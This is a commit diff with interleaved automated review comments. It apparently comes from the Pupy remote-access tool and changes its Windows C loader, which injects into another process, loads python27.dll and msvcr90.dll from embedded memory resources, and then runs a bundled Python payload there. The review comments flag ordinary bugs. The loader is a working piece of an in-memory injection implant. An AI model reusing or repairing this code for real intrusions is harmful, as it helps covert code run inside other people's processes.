fixed a bug where injecting into a process with python27.dll already loaded crashed
This commit is contained in:
parent
76b6cd05e4
commit
bc4b324505
|
@ -1,3 +1,4 @@
|
|||
//#define VERBOSE
|
||||
#ifdef STANDALONE
|
||||
# include <Python.h>
|
||||
# include "Python-version.h"
|
||||
|
|
|
@ -64,6 +64,19 @@ int _load_python_FromFile(char *dllname)
|
|||
return 1;
|
||||
}
|
||||
|
||||
int _load_msvcr90(char *bytes)
|
||||
{
|
||||
HMODULE hmod;
|
||||
ULONG_PTR cookie = 0;
|
||||
cookie = _My_ActivateActCtx();
|
||||
hmod = MyLoadLibrary("msvcr90.dll", bytes, NULL);
|
||||
if (hmod == NULL) {
|
||||
return 0;
|
||||
}
|
||||
_My_DeactivateActCtx(cookie);
|
||||
return 1;
|
||||
|
||||
}
|
||||
int _load_python(char *dllname, char *bytes)
|
||||
{
|
||||
int i;
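Review bot: The early return in the new `_load_msvcr90` (the `if (hmod == NULL)` branch) leaves the activation context activated, because `_My_DeactivateActCtx(cookie)` is only reached on the success path; the failure path should undo the activation too, `if (hmod == NULL) { _My_DeactivateActCtx(cookie); return 0; }`. Whether `_My_DeactivateActCtx` reports failure is not visible here; if it does, its result deserves a check (or at least a `#ifdef VERBOSE` message) rather than being discarded. `ULONG_PTR cookie = 0;` immediately followed by `cookie = _My_ActivateActCtx();` can be collapsed into one initialised declaration, matching the declare-at-first-use style. `_load_python` begins at the end of this hunk and its body continues outside it.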
|
||||
|
|
|
@ -6,6 +6,7 @@ del *.exp
|
|||
del pupyx86.exe
|
||||
del pupyx86.dll
|
||||
|
||||
IF [%1]==[quick] GOTO compilation
|
||||
::First: generate resources :
|
||||
copy resources\python27_x86.dll resources\python27.dll
|
||||
%python_path% gen_library_compressed_string.py
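Review bot: The new `IF [%1]==[quick] GOTO compilation` branch is undocumented, so a reader of the script does not learn that `quick` skips regeneration of the resource headers and `resources_*.c` files and appears to compile whatever is already on disk, stale or absent. A one-line comment above it would make the contract explicit, e.g. `:: usage: build [quick]  -- "quick" skips resource generation and jumps straight to :compilation`. The `:compilation` label it jumps to is in the following hunk.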
|
||||
|
@ -16,14 +17,14 @@ copy resources\msvcr90_x86.dll resources\msvcr90.dll
|
|||
%python_path% gen_resource_header.py resources\msvcr90.dll
|
||||
%python_path% gen_python_bootloader.py
|
||||
%python_path% gen_resource_header.py resources\bootloader.pyc
|
||||
::compile them to obj files :
|
||||
|
||||
:compilation
|
||||
|
||||
%cl_path% /c resources_library_compressed_string_txt.c
|
||||
%cl_path% /c resources_bootloader_pyc.c
|
||||
%cl_path% /c resources_python27_dll.c
|
||||
%cl_path% /c resources_msvcr90_dll.c
|
||||
|
||||
::then compile
|
||||
|
||||
%cl_path% /c Python-dynload.c /IC:\Python27\include
|
||||
%cl_path% /c MemoryModule.c
|
||||
%cl_path% /c _memimporter.c /IC:\Python27\include
|
||||
|
|
|
@ -43,22 +43,35 @@ DWORD WINAPI mainThread(LPVOID lpArg)
|
|||
char * ppath;
|
||||
FILE * f;
|
||||
char tmp_python_dll_path[MAX_PATH];
|
||||
//char tmp_manifest_path[MAX_PATH];
|
||||
char tmp_manifest_path[MAX_PATH];
|
||||
char tmp_path[MAX_PATH];
|
||||
ULONG_PTR cookie = 0;
|
||||
/*
|
||||
ACTCTX ctx;
|
||||
BOOL activated;
|
||||
HANDLE k32;
|
||||
//HANDLE (WINAPI *CreateActCtx)(PACTCTX pActCtx);
|
||||
//BOOL (WINAPI *ActivateActCtx)(HANDLE hActCtx, ULONG_PTR *lpCookie);
|
||||
//void (WINAPI *AddRefActCtx)(HANDLE hActCtx);
|
||||
//BOOL (WINAPI *DeactivateActCtx)(DWORD dwFlags, ULONG_PTR ulCookie);
|
||||
HANDLE (WINAPI *CreateActCtx)(PACTCTX pActCtx);
|
||||
BOOL (WINAPI *ActivateActCtx)(HANDLE hActCtx, ULONG_PTR *lpCookie);
|
||||
void (WINAPI *AddRefActCtx)(HANDLE hActCtx);
|
||||
BOOL (WINAPI *DeactivateActCtx)(DWORD dwFlags, ULONG_PTR ulCookie);
|
||||
*/
|
||||
PyGILState_STATE restore_state;
|
||||
|
||||
_load_python("msvcr90.dll", resources_msvcr90_dll_start); // needed for the python interpreter
|
||||
if(!GetModuleHandle("msvcr90.dll")){
|
||||
#ifndef QUIET
|
||||
fprintf(stderr,"loading msvcr90.dll\n");
|
||||
#endif
|
||||
_load_msvcr90(resources_msvcr90_dll_start);
|
||||
}
|
||||
else{
|
||||
#ifndef QUIET
|
||||
fprintf(stderr,"msvcr90.dll already loaded\n");
|
||||
#endif
|
||||
}
|
||||
|
||||
GetTempPath(MAX_PATH, tmp_path);
|
||||
//InitializeCriticalSection(&csInit);
|
||||
/*
|
||||
/*
|
||||
k32 = LoadLibrary("kernel32");
|
||||
CreateActCtx = (void*)GetProcAddress(k32, "CreateActCtxA");
|
||||
ActivateActCtx = (void*)GetProcAddress(k32, "ActivateActCtx");
|
||||
|
@ -80,7 +93,7 @@ DWORD WINAPI mainThread(LPVOID lpArg)
|
|||
fprintf(f,"%s",resource_python_manifest);
|
||||
fclose(f);
|
||||
#ifndef QUIET
|
||||
printf("manifest written to %s\n",tmp_manifest_path);
|
||||
fprintf(stderr,"manifest written to %s\n",tmp_manifest_path);
|
||||
#endif
|
||||
ctx.lpSource = tmp_manifest_path;
|
||||
|
||||
|
@ -92,37 +105,55 @@ DWORD WINAPI mainThread(LPVOID lpArg)
|
|||
#ifndef QUIET
|
||||
DeleteFile(tmp_manifest_path);
|
||||
#endif
|
||||
*/
|
||||
*/
|
||||
|
||||
if(!Py_IsInitialized)
|
||||
{
|
||||
int res=0;
|
||||
//activated = ActivateActCtx(MyActCtx, &actToken);
|
||||
if(!_load_python("python27.dll", resources_python27_dll_start)){
|
||||
|
||||
//cookie=_My_ActivateActCtx();
|
||||
if(GetModuleHandle("python27.dll")){
|
||||
HANDLE hp;
|
||||
#ifndef QUIET
|
||||
printf("loading python27.dll from memory failed\n");
|
||||
fprintf(stderr,"python27.dll is already loaded\n");
|
||||
#endif
|
||||
_load_python_FromFile("python27.dll"); // does not actually load a new python, but uses the handle of the already loaded one
|
||||
}
|
||||
else{
|
||||
if(!_load_python("python27.dll", resources_python27_dll_start)){
|
||||
#ifndef QUIET
|
||||
fprintf(stderr,"loading python27.dll from memory failed\n");
|
||||
#endif
|
||||
|
||||
//if loading from memory fail, we write dll on disk
|
||||
sprintf(tmp_python_dll_path, "%spython27.dll", tmp_path);
|
||||
//if loading from memory fail, we write dll on disk
|
||||
sprintf(tmp_python_dll_path, "%spython27.dll", tmp_path);
|
||||
|
||||
f=fopen(tmp_python_dll_path,"wb");
|
||||
res=fwrite(resources_python27_dll_start, sizeof(char), resources_python27_dll_size, f);
|
||||
fclose(f);
|
||||
f=fopen(tmp_python_dll_path,"wb");
|
||||
res=fwrite(resources_python27_dll_start, sizeof(char), resources_python27_dll_size, f);
|
||||
fclose(f);
|
||||
|
||||
if(!_load_python(tmp_python_dll_path, NULL)){
|
||||
if(!_load_python("python27.dll", NULL)){ // try loading from system PATH
|
||||
#ifndef QUIET
|
||||
printf("could not load python dll\n");
|
||||
#endif
|
||||
if(!_load_python(tmp_python_dll_path, NULL)){
|
||||
if(!_load_python("python27.dll", NULL)){ // try loading from system PATH
|
||||
#ifndef QUIET
|
||||
fprintf(stderr,"could not load python dll\n");
|
||||
#endif
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
#ifndef QUIET
|
||||
printf("python interpreter loaded\n");
|
||||
fprintf(stderr,"python interpreter loaded\n");
|
||||
#endif
|
||||
|
||||
}
|
||||
//_My_DeactivateActCtx(cookie);
|
||||
}
|
||||
#ifndef QUIET
|
||||
fprintf(stderr,"calling PyEval_InitThreads() ...\n");
|
||||
#endif
|
||||
PyEval_InitThreads();
|
||||
#ifndef QUIET
|
||||
fprintf(stderr,"PyEval_InitThreads() called\n");
|
||||
#endif
|
||||
if(!Py_IsInitialized()){
|
||||
ppath = Py_GetPath();
|
||||
strcpy(ppath, "\x00");
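Review bot: The return value of `_load_python_FromFile("python27.dll")` in the new `if(GetModuleHandle("python27.dll"))` branch is ignored, unlike the `_load_python` calls in the `else` branch, so a failed resolution of the already-loaded module still falls through to the "python interpreter loaded" message and on to `PyEval_InitThreads()` below, presumably through an unresolved function pointer; it should be tested like the other path, `if(!_load_python_FromFile("python27.dll")){ /* report and bail out before PyEval_InitThreads() */ }`. The same fall-through exists at the end of the fallback chain: after "could not load python dll" nothing stops the thread from continuing into `PyEval_InitThreads()`. `HANDLE hp;` declared in the new branch is never used, and `fopen(tmp_python_dll_path,"wb")` is still used without a NULL check before `fwrite`/`fclose`. `sprintf(tmp_python_dll_path, "%spython27.dll", tmp_path)` writes unbounded into a `MAX_PATH` buffer whose prefix comes from `GetTempPath` (itself unchecked); `snprintf(tmp_python_dll_path, sizeof tmp_python_dll_path, ...)` with a truncation check is the safe form. `mainThread` starts and ends outside this hunk.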
|
||||
|
||||
|
@ -131,21 +162,19 @@ DWORD WINAPI mainThread(LPVOID lpArg)
|
|||
Py_Initialize();
|
||||
|
||||
#ifndef QUIET
|
||||
printf("Py_Initialize()\n");
|
||||
fprintf(stderr,"Py_Initialize()\n");
|
||||
#endif
|
||||
PySys_SetObject("frozen", PyBool_FromLong(1));
|
||||
}
|
||||
|
||||
|
||||
restore_state=PyGILState_Ensure();
|
||||
PySys_SetObject("frozen", PyBool_FromLong(1));
|
||||
|
||||
init_memimporter();
|
||||
#ifndef QUIET
|
||||
printf("init_memimporter()\n");
|
||||
fprintf(stderr,"init_memimporter()\n");
|
||||
#endif
|
||||
initpupy();
|
||||
#ifndef QUIET
|
||||
printf("initpupy()\n");
|
||||
fprintf(stderr,"initpupy()\n");
|
||||
#endif
|
||||
|
||||
//mod = PyImport_ImportModule("sys");
|
||||
|
@ -153,9 +182,8 @@ DWORD WINAPI mainThread(LPVOID lpArg)
|
|||
//MessageBoxA(0, "hey ! :D", "DLL Message", MB_OK | MB_ICONINFORMATION);
|
||||
|
||||
/* We execute then in the context of '__main__' */
|
||||
PyEval_InitThreads();
|
||||
#ifndef QUIET
|
||||
printf("starting evaluating python code ...\n");
|
||||
fprintf(stderr,"starting evaluating python code ...\n");
|
||||
#endif
|
||||
//PyRun_SimpleString("print 'ok from python'");
|
||||
m = PyImport_AddModule("__main__");
|
||||
|
@ -184,7 +212,7 @@ DWORD WINAPI mainThread(LPVOID lpArg)
|
|||
/*
|
||||
if (!DeactivateActCtx(0, actToken)){
|
||||
#ifndef QUIET
|
||||
printf("LOADER: Error deactivating context!\n!");
|
||||
fprintf(stderr,"LOADER: Error deactivating context!\n!");
|
||||
#endif
|
||||
}
|
||||
*/
|
||||
|
|